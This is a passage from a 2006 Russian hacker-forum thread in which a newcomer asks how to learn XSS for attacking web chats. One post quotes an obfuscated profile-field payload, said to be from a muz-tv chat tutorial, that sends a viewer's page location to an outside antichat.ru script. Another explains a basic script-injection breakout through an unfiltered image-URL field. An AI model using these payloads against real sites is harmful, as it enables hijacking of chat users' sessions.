ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 27.03.2006, 17:21
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
Провел на форуме:
27564

Репутация: 5
Отправить сообщение для x[M]akep с помощью ICQ
По умолчанию

Цитата:
Сообщение от NeX  
Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!
А как научится определять XSS
 
Ответить с цитированием

  #12  
Старый 27.03.2006, 17:26
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
Провел на форуме:
27564

Репутация: 5
Отправить сообщение для x[M]akep с помощью ICQ
По умолчанию

Я качал я VIDEO.ANTICHAT.RU ролики и там вот напримере muz-tv_chat-xss чувак пишет:

В поле "О себе"
' style='background:url(javascript:document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg?/.sourse.replace(/x/g,String.fromCharcode(47))+opener.location)' s

ОТКУДА ОН ВАЩЕ ЭТО ВЗЯЛ? Откуда узнал что это сработает?
 
Ответить с цитированием

  #13  
Старый 27.03.2006, 17:33
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

исходный код посмотри и всё поймёшь...
 
Ответить с цитированием

  #14  
Старый 27.03.2006, 17:59
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
Провел на форуме:
27564

Репутация: 5
Отправить сообщение для x[M]akep с помощью ICQ
По умолчанию

Цитата:
Сообщение от VectorG  
исходный код посмотри и всё поймёшь...
Код чего сайта
 
Ответить с цитированием

  #15  
Старый 27.03.2006, 18:03
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

Цитата:
Сообщение от x[M]akep  
Код чего сайта
html код страницы куда впихнётся твой код с xss из поля "О себе" "
 
Ответить с цитированием

  #16  
Старый 27.03.2006, 18:19
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
Провел на форуме:
27564

Репутация: 5
Отправить сообщение для x[M]akep с помощью ICQ
По умолчанию

Цитата:
Сообщение от VectorG  
html код страницы куда впихнётся твой код с xss из поля "О себе" "
ты конечно извини за мою надоедливость но вот еще тебе вопросик: Как понять можно ли туда его запихнуть или нельзя? Что для этого нужно знать?

p.s. SORRI народ вы не думайте что я ламер но просто мне хочется узнать чуть больше обо всем этом!!! И к томуже вы тоже у когото этому научились так помогите и мне
 
Ответить с цитированием

  #17  
Старый 27.03.2006, 18:55
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

Хм... Почитай статьи на ачате про взлом чатов... Тебе станет немного понятней, что это =)

http://antichat.ru/crackchat/index.html
http://antichat.ru/txt/old/chat_faq.shtm
http://antichat.ru/crackchat/java.htmll
 
Ответить с цитированием

  #18  
Старый 27.03.2006, 19:00
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Поищи в интернете в гугле www.google.com мануалы по XSS что да как и всё поймёш....
 
Ответить с цитированием

  #19  
Старый 27.03.2006, 19:50
x[M]akep
Новичок
Регистрация: 26.03.2006
Сообщений: 24
Провел на форуме:
27564

Репутация: 5
Отправить сообщение для x[M]akep с помощью ICQ
По умолчанию

ПАСИБ! А что надо знать чтобы этим заниматся
 
Ответить с цитированием

  #20  
Старый 27.03.2006, 19:56
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

Цитата:
http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html

это так к слову...


собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:

PHP код:
<img src="http://url_фотки/nax.jpg"
там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...

собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:

PHP код:
<img src="http://url_фотки/nax.jpg"><script>alert("nax")</script>"> 
я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!

дальше работает знание и воображение

http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss

а чтобы понимать xss нужно знание html и javascript
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Народ!!! Помогите НАМ!!! Помогите покончить с беспределом!!! Monah Чаты 7 24.08.2005 07:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ